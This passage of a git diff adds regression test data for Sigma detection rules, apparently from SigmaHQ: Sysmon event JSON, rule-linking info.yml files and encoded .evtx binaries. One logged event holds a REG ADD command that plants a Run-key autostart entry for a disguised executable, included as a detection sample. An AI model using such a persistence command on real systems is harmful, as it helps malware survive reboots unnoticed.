"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml new file mode 100644 index 000000000..0765e7710 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml @@ -0,0 +1,13 @@ +id: 0f52b7ec-72e4-4362-acf5-b5558ff58323 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: fa00b701-44c6-4679-994d-5a18afa8a707 + title: PUA - AdvancedRun Suspicious Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx new file mode 100644 index 0000000000000000000000000000000000000000..374fc336754d067e11aaa5454e6fab5aa0edd962 GIT binary patch literal 69632 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 PP6v>Sc||VjLN0y^`1~(v literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json new file mode 100644 index 000000000..0d846f7a7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:35:26.043284Z" + } + }, + "EventRecordID": 256890, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:35:26.041", + "ProcessGuid": "5AB40FD1-400E-68F9-6331-000000003B02", + "ProcessId": 6032, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"softoz\" /t REG_SZ /F /D \"C:\\Users\\admin\\AppData\\Roaming\\sihostt.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml new file mode 100644 index 000000000..c196ea8c7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml @@ -0,0 +1,13 @@ +id: e60e5322-dc51-4969-be3b-12caad8a9276 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: de587dce-915e-4218-aac4-835ca6af6f70 + title: Potential Persistence Attempt Via Run Keys Using Reg.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx new file mode 100644 index 0000000000000000000000000000000000000000..cb3ddab44dbf7889228043aa4ebea30ac8d3ade2 GIT binary patch literal 69632 zcmeHQdvF`ad0#>#MLkGLj$}J&?7)e+r-o6F-g-&>$r8Eb!XxvlX2{1Qa5(g z-?w{vI6weJS_H+%fpfguyKi^D-S6Ao@B8-K-FSMkFO^nV`OjgzxEFT^+r-$8x^j?9 z4u@a-edv-Cu@kUsz^(zi2J9NJYrw7ny9VqUuxr4s0lNn58nA1?u7QizKs-Geoz`ZU z)b6X@@1>Mr6xeYEW7p^I_|uCfd=UW3=YRfv``4{t*EAxFCdOW9VC-l0)-R0RjQ9Is zhFI$F+ZT!RR^&;)Ymg`XerLdc!gx>bK7x0XW%#@i;r}&^B(EvUBV(jRasSGA9t3P3 z()?0cIs~)W-+yghEM#T4*Gr?0<@3!qgQh!}N&naFOh55~=+kwrb#-ieUFQQozfZ=Z z=XdrtOg#C3=Y}_bXT0g{C<#G@ce1zOkqSt^FKusNadwKSOk)LvAH>yo!ua_2tqtrn z%dj*)>iE!5*Ttp*R$w_6WN!TFEP*#FU=%#Jvc3ZZ?N+8txs; zgFhdhJj{>(s+qlB5^~g?KmRSzO42Pm+Q>%OJW?+39Kn6z^XKmbUXr4}KHJ2GcvP+jkV#0_EJo4XbP$>PaxH?RQ!60Oo4h!K#3y%vGj8hjc*ThB&0EoL}~ zgEFjRP6Vh4(C^V}8`&WckjO$+MA_9*N)7CK1Z2xO@tr1iJ3h~YZduf067^1?4QzKk zs(lE7_ZcbfeRvx(P4PO70#pS8M4}{Mc=b>#BA)6!yS0RZG7_q%k?q`6w-ww{>`VGK zHCt+X7zq-}go&tmN6S{Wm2f$SNU}rt`19LXl!Fl-X^x4k)}w&y>oZ#T)?aUBVWe09 z;>0ZllvJeKvYE9uQl~& z0O0{@GQwr+lUod)O#o2GpMgaaYigvfl}LLo(1aSEHtJSZK+6`^w5e_fXD8~6>32U^ zGzv%sjHGeAiD)}mU47m8^F9DjuSSI1t2Ob8%77IJInh=e4RuY3n`bVgxw@E_Q5{DR zRd&7~Yi|M>i5#j2Rx`{BufMmC1BP^w0GwzF4ls&CoJuB&Gll+c6K^9vk` zfl6TC#CEeLwi92$+IXU?iEZU@h|b@85Zb|7*#X@5ZoQ7DB1b`Xuj~)syq&RUkkAKy zA)0Oj8Ug(pDCI$I-70H2yaAp5H&U z)c9`R-l!_5T?lTZ9zt~5clQ_ka;Tu^ZHc|d>fZE@e|~xF)4P5MLJ<^b_iuQl(UyL( z`-rh*ryb+TDtJ%*VE}g;eTl!`nXN}3MVZpqSL14=evoK94BDkZ9@!T}!qbu>FzE5*6Vi1SCq^e=1xN#$p^<$KC2l$4tn8Kw2KFwr#id5UOKuJVSR8z#+ z13VR~F*GQuv5GlHd7GxbljMOI;?Ogdin?CHcbkY!G$%fz)@tBeZ#H>H^L7DMk=g@D zYl^q5B6pzsB%CU8UlG0^<#05&h#^RF`YlBac7jK#osk$KYK;0R>QqIm6Y*OGXLTAS zpgfHdw1Bgy+$!*sJzH_ibu?2y3M}^+F?SbZHljl!5r~8#9XRe3kQH$p0;H^A!8x+) zFV@EuqCUEeocJ&*T39PuShe_~e6JGatI|4)ajmUr*CO$)##6gRe4+($#Wls6*;<0H z926YQS0Y9|qi)85uDspo)~U*tR=y8p%LQ(hp(_BtNf z!Z1t*+0n8Q;%JE=(~0zsa+*#dC6$l)lv_K$NZ{>+!0SiYi@a|%(u$z1QU8?W@4Ep- zalAa1A5R{36PG=x{gcp3?a#>vZ4$?`yk~QwMzZ|*!cpl_K$nhd^oC@=;#j1C)14({ zxiB4(XCCpW4=9dd#KXn%ijWhjB>

xK6VfV3|SP=m<-}{V2*nl7nmm#8cGjNNq@S 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 